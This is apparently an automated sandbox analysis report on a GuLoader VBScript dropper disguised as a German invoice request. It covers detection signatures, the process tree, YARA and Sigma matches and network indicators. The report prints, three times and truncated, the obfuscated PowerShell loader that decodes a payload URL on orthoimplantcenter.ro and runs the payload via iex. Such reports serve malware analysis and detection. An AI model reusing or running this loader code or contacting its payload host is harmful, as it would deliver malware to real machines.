
Windows Analysis Report
Anfrage fur Proforma-Lieferrechnung und Zahlungsbedingungen.vbs

Overview

General Information

Sample name: Anfrage fur Proforma-Lieferrechnung und Zahlungsbedingungen.vbs
Analysis ID: 1538491
MD5: 74bea39444aaab616939adfb22141173
SHA1: 68146894fedfe6a2c68fdbecfc6b26ce98c164e8
SHA256: 116129cfa708ab230b404febfa3a41c86c226849d41dde4120372d38c527be2d
Tags: vbs, user-lowmal3

Detection

GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Potential evasive VBS script found (sleep loop)
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Uses ping.exe to check the status of other devices and networks
Wscript starts Powershell (via cmd or directly)
Abnormal high CPU Usage
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 7460 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Anfrage fur Proforma-Lieferrechnung und Zahlungsbedingungen.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • PING.EXE (PID: 7572 cmdline: ping gormezl_6777.6777.6777.677e MD5: 2F46799D79D22AC72C241EC0322B011D)
      • conhost.exe (PID: 7580 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7660 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [obfuscated PowerShell command line omitted] MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7668 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • powershell.exe (PID: 8028 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" [obfuscated PowerShell command line omitted] MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • conhost.exe (PID: 8036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Blogpost URLs:
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
No configs have been found
Source | Rule | Description | Author | Strings
00000007.00000002.2865648783.0000000008A40000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_5 | Yara detected GuLoader | Joe Security |
00000007.00000002.2850277699.0000000005F1A000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_GuLoader_5 | Yara detected GuLoader | Joe Security |
00000007.00000002.2865783140.00000000095EB000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security |
00000004.00000002.1704308297.000001DE999BE000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_GuLoader_5 | Yara detected GuLoader | Joe Security |
Process Memory Space: powershell.exe PID: 7660 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
Source | Rule | Description | Author | Strings
amsi64_7660.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
amsi32_8028.amsi.csv | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen |
  • 0xc427:$b2: ::FromBase64String(
  • 0xb48d:$s1: -join
  • 0x4c39:$s4: +=
  • 0x4cfb:$s4: +=
  • 0x8f22:$s4: +=
  • 0xb03f:$s4: +=
  • 0xb329:$s4: +=
  • 0xb46f:$s4: +=
  • 0x1539a:$s4: +=
  • 0x1541a:$s4: +=
  • 0x154e0:$s4: +=
  • 0x15560:$s4: +=
  • 0x15736:$s4: +=
  • 0x157ba:$s4: +=
  • 0xbcba:$e4: Get-WmiObject
  • 0xbea9:$e4: Get-Process
  • 0xbf01:$e4: Start-Process
  • 0x16048:$e4: Get-Process

System Summary

Source: Process started | Author: Jonathan Cheong, oscd.community | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [obfuscated PowerShell command line omitted]
Source: Process started | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community | Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Anfrage fur Proforma-Lieferrechnung und Zahlungsbedingungen.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Anfrage fur Proforma-Lieferrechnung und Zahlungsbedingungen.vbs", CommandLine|base64offset|contains: ~, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2592, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Anfrage fur Proforma-Lieferrechnung und Zahlungsbedingungen.vbs", ProcessId: 7460, ProcessName: wscript.exe
Source: Process started | Author: Michael Haag | Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Anfrage fur Proforma-Lieferrechnung und Zahlungsbedingungen.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Anfrage fur Proforma-Lieferrechnung und Zahlungsbedingungen.vbs", CommandLine|base64offset|contains: ~, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2592, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Anfrage fur Proforma-Lieferrechnung und Zahlungsbedingungen.vbs", ProcessId: 7460, ProcessName: wscript.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [obfuscated PowerShell command line omitted]
No Suricata rule has matched

AV Detection

Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.2% probability
Source: unknown | HTTPS traffic detected: 188.241.183.45:443 -> 192.168.2.11:49706 version: TLS 1.2
Source: Binary string: m.Core.pdbk source: powershell.exe, 00000007.00000002.2864093210.0000000008588000.00000004.00000020.00020000.00000000.sdmp

Software Vulnerabilities

Source: C:\Windows\System32\wscript.exe | Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Networking

Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\PING.EXE ping gormezl_6777.6777.6777.677e
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: global traffic | HTTP traffic detected: GET /Bestyret.ocx HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
  Host: orthoimplantcenter.ro
  Connection: Keep-Alive
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: gormezl_6777.6777.6777.677e
Source: global traffic | DNS traffic detected: DNS query: orthoimplantcenter.ro
Source: powershell.exe, 00000007.00000002.2864093210.0000000008570000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.micro
Source: 77EC63BDA74BD0D0E0426DC8F80085060.1.dr | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: wscript.exe, 00000001.00000002.1564405714.000001B46EDBC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1562697497.000001B46EDAF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1563518584.000001B46EDBC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab:
Source: wscript.exe, 00000001.00000003.1555385159.000001B46EE0A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?91b5065270408
Source: wscript.exe, 00000001.00000003.1554978924.000001B470C57000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1555631445.000001B470C57000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1554448292.000001B470C57000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabl
Source: wscript.exe, 00000001.00000002.1564405714.000001B46EDBC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1562697497.000001B46EDAF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1563518584.000001B46EDBC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabmexol
Source: wscript.exe, 00000001.00000002.1564405714.000001B46EDBC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1562697497.000001B46EDAF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1563518584.000001B46EDBC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enj
Source: wscript.exe, 00000001.00000003.1555506674.000001B46EE32000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1555385159.000001B46EE0A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?91b5065270
Source: powershell.exe, 00000004.00000002.1704308297.000001DE999BE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2850277699.0000000005DD6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000004.00000002.1684347363.000001DE8B6D1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://orthoimplantcenter.ro
Source: powershell.exe, 00000007.00000002.2833765979.0000000004EC7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000004.00000002.1684347363.000001DE89951000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2833765979.0000000004D71000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000004.00000002.1710822472.000001DEA2092000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://wicroft.com
Source: powershell.exe, 00000007.00000002.2833765979.0000000004EC7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: powershell.exe, 00000004.00000002.1684347363.000001DE89951000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
              Source: powershell.exe, 00000007.00000002.2833765979.0000000004D71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB_q
              Source: powershell.exe, 00000007.00000002.2850277699.0000000005DD6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000007.00000002.2850277699.0000000005DD6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000007.00000002.2850277699.0000000005DD6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: powershell.exe, 00000007.00000002.2833765979.0000000004EC7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 00000004.00000002.1684347363.000001DE8AD57000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
              Source: powershell.exe, 00000004.00000002.1704308297.000001DE999BE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2850277699.0000000005DD6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: powershell.exe, 00000004.00000002.1684347363.000001DE89B78000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1684347363.000001DE8B300000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://orthoimplantcenter.ro
              Source: powershell.exe, 00000004.00000002.1684347363.000001DE89B78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://orthoimplantcenter.ro/Bestyret.ocxP
              Source: powershell.exe, 00000007.00000002.2833765979.0000000004EC7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://orthoimplantcenter.ro/Bestyret.ocxXR1lX
              Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
              Source: unknownHTTPS traffic detected: 188.241.183.45:443 -> 192.168.2.11:49706 version: TLS 1.2

              System Summary

              Source: amsi32_8028.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 7660, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 8028, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Inspeaking Overpratice Hreapparater Heteroscian #>;$Filibusterous='Koordinatvrdiernes';<#Panhygrous Procurer Cantors Emeraldine #>;$Husklike=$Erhvervsaffaldets+$host.UI; function Lymnaeid($Simonize){If ($Husklike) {$Methodisty++;}$Minimumstermometeret=$Knaster+$Simonize.'Length'-$Methodisty; for( $Pales=4;$Pales -lt $Minimumstermometeret;$Pales+=5){$Postcardinal=$Pales;$Dekompressionen+=$Simonize[$Pales];$underbreeding='Helstegte';}$Dekompressionen;}function Orfrays($Advolution){ .($Landbetjents) ($Advolution);}$originate=Lymnaeid 'UnsuMAntiokampzBlegi R,nlBerelHobbaCo p/ run ';$originate+=Lymnaeid 'fors5Kjel.Thom0F,rb Nama(KaprW UnfiNo onDueldS,jdolagowMil,sObsc SixpN UndTPoly Skri1 Dyb0rigs.Toko0Scia;Unde BullWUnpri IndnNont6 Res4Soci;lind AminxBlya6Hngs4met.;rlin CaprfolkvLizz:Egoi1Tand3Fest1Anta. .al0 Fi )Cl.p JogG yrkedecoc.orbkG.aso fej/ Kir2Skil0erek1 ob0 c,n0Myon1Prod0Ddss1Acqu PumFAt,li .lorIndieHus fDeloo Im,xBena/Tha 1Colo3S ip1Pap . 
git0 Tre ';$Vgtighedens=Lymnaeid 'Erh.u Bous D fE Currunbl-parka P,pgstate axnBibltFore ';$Adaptively=Lymnaeid ' trh Bist Cont An pFares B,l:Agen/Rund/KvaloDeforC ratStabhBruloVe biBo,smOutspSolfl.kdea BaanSnontDeckcBuc eSokknVerdt U,eeNondrFire.arkarNldeoTech/CarbBPageeB.rtsSlabtDobbyPolir HeleUn.etBed,.squaoMirkc Uncximcn ';$Reformbevgelser=Lymnaeid 'Pre,>R,ma ';$Landbetjents=Lymnaeid 'Ma ci,atoE impxS.rv ';$Befolk='lousin';$Vitalizings='\Kinetoplast.Liq';Orfrays (Lymnaeid 'Patr$BrysgUnpol So OKronB UpsaS iklLulu: icho Pr.dU,naI Sy SAlloEkatarprecELevi=Rede$Do re SalnKlikvChef:lynnAMa opFluoPS msdKamea,nddtE eraPyro+Foto$ Vr.vNadvI OphT ilmA Letl ,idiSubtzBawdiDy en Re GMilkSBr.t ');Orfrays (Lymnaeid ' S r$af rg,pspLDr,aOOpfoBCo ca UndlTe r:Hyp.dHun.O,remBUnspbnar ENamel Maht HiehUnchENedsdUpereRabaRFossN LogE a bsSham= r c$Di kALyttdDrataTiggP DeitTvanIScanVD maeRom L,odsYAnan.MegasTradpb dqlUdgiIune.T J n(Tr a$Srnur eaueAngeF Fo.OGradr VelMEst,b ileDatav Gu.GRetoEC.njLPhansSjleE Tonr Ecd)G ln ');Orfrays (Lymnaeid ' Svm[HespNEuklE bnetHest.BackSF dsEPolyRVic vConsIKultCEnduE egiPKonkoGrypiSmaaNAaret RhymKulmAGennnanalA L aGM,skekonfrairm] Lux: D.k:Nonms Di.EOverc OveUDispRCaviIActutJuryyBygnpRin,RGrimoM.eaTOpdaoDuoeCHudiOManiLUn n Farv=E,te Brug[ UndnTungeRigsTSky .BilcSR goE AttcSw,euKorrrCaphi Kikt andYNavnpBlokREk io Armt AmaoO,nocspoooU,trl Ma.TC viY.rogPMyste U y]Hal :Chin:AlahtEm,iL EncSDepe1Udda2Az m ');$Adaptively=$Dobbelthedernes[0];$Udbyttebehandling=(Lymnaeid ' Lea$DrilGPneuLHoteOBeneBSem.aNdeslPyic:PuliG kniYDiscM F gNSk mAfamisKvisIThigUD.ntmSimu=BrugnPeleE.aboW imr-UnsooAk ibPoliJ,dpoeTolvCS riTAgro AsmasSk iYMastsNonotimpeEquo MSu c.antinImprEKabuTPaa,. BygwVandESligBOutpCInd LBoliidiasEGramn AffTBe,i ');Orfrays ($Udbyttebehandling);Orfrays (Lymnaeid 'Vu g$RevoG nimy JagmRykknDiglachrisAktii wrouTra mSa,o.af.eH oopeEnroaOstrd Mone storArtis cle[Hand$TypeV EksgNs
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess Stats: CPU usage > 49%
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_032BEDE07_2_032BEDE0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_032BFAB87_2_032BFAB8
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_032BEA987_2_032BEA98
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_0797CEE07_2_0797CEE0
              Source: Anfrage fur Proforma-Lieferrechnung und Zahlungsbedingungen.vbsInitial sample: Strings found which are bigger than 50
              Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 6127
              Source: unknownProcess created: Commandline size = 6127
              Source: amsi32_8028.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 7660, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 8028, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: classification engineClassification label: mal100.troj.expl.evad.winVBS@9/9@2/1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Kinetoplast.Liq
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7580:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8036:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7668:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l30usody.dgt.ps1
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Anfrage fur Proforma-Lieferrechnung und Zahlungsbedingungen.vbs"
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process Where Name = &apos;Podedes.exe&apos;
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7660
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=8028
              Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.ini
              Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\PING.EXE ping gormezl_6777.6777.6777.677e
              Source: C:\Windows\System32\PING.EXEProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Inspeaking Overpratice Hreapparater Heteroscian #>;$Filibusterous='Koordinatvrdiernes';<#Panhygrous Procurer Cantors Emeraldine #>;$Husklike=$Erhvervsaffaldets+$host.UI; function Lymnaeid($Simonize){If ($Husklike) {$Methodisty++;}$Minimumstermometeret=$Knaster+$Simonize.'Length'-$Methodisty; for( $Pales=4;$Pales -lt $Minimumstermometeret;$Pales+=5){$Postcardinal=$Pales;$Dekompressionen+=$Simonize[$Pales];$underbreeding='Helstegte';}$Dekompressionen;}function Orfrays($Advolution){ .($Landbetjents) ($Advolution);}$originate=Lymnaeid 'UnsuMAntiokampzBlegi R,nlBerelHobbaCo p/ run ';$originate+=Lymnaeid 'fors5Kjel.Thom0F,rb Nama(KaprW UnfiNo onDueldS,jdolagowMil,sObsc SixpN UndTPoly Skri1 Dyb0rigs.Toko0Scia;Unde BullWUnpri IndnNont6 Res4Soci;lind AminxBlya6Hngs4met.;rlin CaprfolkvLizz:Egoi1Tand3Fest1Anta. .al0 Fi )Cl.p JogG yrkedecoc.orbkG.aso fej/ Kir2Skil0erek1 ob0 c,n0Myon1Prod0Ddss1Acqu PumFAt,li .lorIndieHus fDeloo Im,xBena/Tha 1Colo3S ip1Pap . 
git0 Tre ';$Vgtighedens=Lymnaeid 'Erh.u Bous D fE Currunbl-parka P,pgstate axnBibltFore ';$Adaptively=Lymnaeid ' trh Bist Cont An pFares B,l:Agen/Rund/KvaloDeforC ratStabhBruloVe biBo,smOutspSolfl.kdea BaanSnontDeckcBuc eSokknVerdt U,eeNondrFire.arkarNldeoTech/CarbBPageeB.rtsSlabtDobbyPolir HeleUn.etBed,.squaoMirkc Uncximcn ';$Reformbevgelser=Lymnaeid 'Pre,>R,ma ';$Landbetjents=Lymnaeid 'Ma ci,atoE impxS.rv ';$Befolk='lousin';$Vitalizings='\Kinetoplast.Liq';Orfrays (Lymnaeid 'Patr$BrysgUnpol So OKronB UpsaS iklLulu: icho Pr.dU,naI Sy SAlloEkatarprecELevi=Rede$Do re SalnKlikvChef:lynnAMa opFluoPS msdKamea,nddtE eraPyro+Foto$ Vr.vNadvI OphT ilmA Letl ,idiSubtzBawdiDy en Re GMilkSBr.t ');Orfrays (Lymnaeid ' S r$af rg,pspLDr,aOOpfoBCo ca UndlTe r:Hyp.dHun.O,remBUnspbnar ENamel Maht HiehUnchENedsdUpereRabaRFossN LogE a bsSham= r c$Di kALyttdDrataTiggP DeitTvanIScanVD maeRom L,odsYAnan.MegasTradpb dqlUdgiIune.T J n(Tr a$Srnur eaueAngeF Fo.OGradr VelMEst,b ileDatav Gu.GRetoEC.njLPhansSjleE Tonr Ecd)G ln ');Orfrays (Lymnaeid ' Svm[HespNEuklE bnetHest.BackSF dsEPolyRVic vConsIKultCEnduE egiPKonkoGrypiSmaaNAaret RhymKulmAGennnanalA L aGM,skekonfrairm] Lux: D.k:Nonms Di.EOverc OveUDispRCaviIActutJuryyBygnpRin,RGrimoM.eaTOpdaoDuoeCHudiOManiLUn n Farv=E,te Brug[ UndnTungeRigsTSky .BilcSR goE AttcSw,euKorrrCaphi Kikt andYNavnpBlokREk io Armt AmaoO,nocspoooU,trl Ma.TC viY.rogPMyste U y]Hal :Chin:AlahtEm,iL EncSDepe1Udda2Az m ');$Adaptively=$Dobbelthedernes[0];$Udbyttebehandling=(Lymnaeid ' Lea$DrilGPneuLHoteOBeneBSem.aNdeslPyic:PuliG kniYDiscM F gNSk mAfamisKvisIThigUD.ntmSimu=BrugnPeleE.aboW imr-UnsooAk ibPoliJ,dpoeTolvCS riTAgro AsmasSk iYMastsNonotimpeEquo MSu c.antinImprEKabuTPaa,. BygwVandESligBOutpCInd LBoliidiasEGramn AffTBe,i ');Orfrays ($Udbyttebehandling);Orfrays (Lymnaeid 'Vu g$RevoG nimy JagmRykknDiglachrisAktii wrouTra mSa,o.af.eH oopeEnroaOstrd Mone storArtis cle[Hand$TypeV EksgNs
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Inspeaking Overpratice Hreapparater Heteroscian #>;$Filibusterous='Koordinatvrdiernes';<#Panhygrous Procurer Cantors Emeraldine #>;$Husklike=$Erhvervsaffaldets+$host.UI; function Lymnaeid($Simonize){If ($Husklike) {$Methodisty++;}$Minimumstermometeret=$Knaster+$Simonize.'Length'-$Methodisty; for( $Pales=4;$Pales -lt $Minimumstermometeret;$Pales+=5){$Postcardinal=$Pales;$Dekompressionen+=$Simonize[$Pales];$underbreeding='Helstegte';}$Dekompressionen;}function Orfrays($Advolution){ .($Landbetjents) ($Advolution);}$originate=Lymnaeid 'UnsuMAntiokampzBlegi R,nlBerelHobbaCo p/ run ';$originate+=Lymnaeid 'fors5Kjel.Thom0F,rb Nama(KaprW UnfiNo onDueldS,jdolagowMil,sObsc SixpN UndTPoly Skri1 Dyb0rigs.Toko0Scia;Unde BullWUnpri IndnNont6 Res4Soci;lind AminxBlya6Hngs4met.;rlin CaprfolkvLizz:Egoi1Tand3Fest1Anta. .al0 Fi )Cl.p JogG yrkedecoc.orbkG.aso fej/ Kir2Skil0erek1 ob0 c,n0Myon1Prod0Ddss1Acqu PumFAt,li .lorIndieHus fDeloo Im,xBena/Tha 1Colo3S ip1Pap . 
git0 Tre ';$Vgtighedens=Lymnaeid 'Erh.u Bous D fE Currunbl-parka P,pgstate axnBibltFore ';$Adaptively=Lymnaeid ' trh Bist Cont An pFares B,l:Agen/Rund/KvaloDeforC ratStabhBruloVe biBo,smOutspSolfl.kdea BaanSnontDeckcBuc eSokknVerdt U,eeNondrFire.arkarNldeoTech/CarbBPageeB.rtsSlabtDobbyPolir HeleUn.etBed,.squaoMirkc Uncximcn ';$Reformbevgelser=Lymnaeid 'Pre,>R,ma ';$Landbetjents=Lymnaeid 'Ma ci,atoE impxS.rv ';$Befolk='lousin';$Vitalizings='\Kinetoplast.Liq';Orfrays (Lymnaeid 'Patr$BrysgUnpol So OKronB UpsaS iklLulu: icho Pr.dU,naI Sy SAlloEkatarprecELevi=Rede$Do re SalnKlikvChef:lynnAMa opFluoPS msdKamea,nddtE eraPyro+Foto$ Vr.vNadvI OphT ilmA Letl ,idiSubtzBawdiDy en Re GMilkSBr.t ');Orfrays (Lymnaeid ' S r$af rg,pspLDr,aOOpfoBCo ca UndlTe r:Hyp.dHun.O,remBUnspbnar ENamel Maht HiehUnchENedsdUpereRabaRFossN LogE a bsSham= r c$Di kALyttdDrataTiggP DeitTvanIScanVD maeRom L,odsYAnan.MegasTradpb dqlUdgiIune.T J n(Tr a$Srnur eaueAngeF Fo.OGradr VelMEst,b ileDatav Gu.GRetoEC.njLPhansSjleE Tonr Ecd)G ln ');Orfrays (Lymnaeid ' Svm[HespNEuklE bnetHest.BackSF dsEPolyRVic vConsIKultCEnduE egiPKonkoGrypiSmaaNAaret RhymKulmAGennnanalA L aGM,skekonfrairm] Lux: D.k:Nonms Di.EOverc 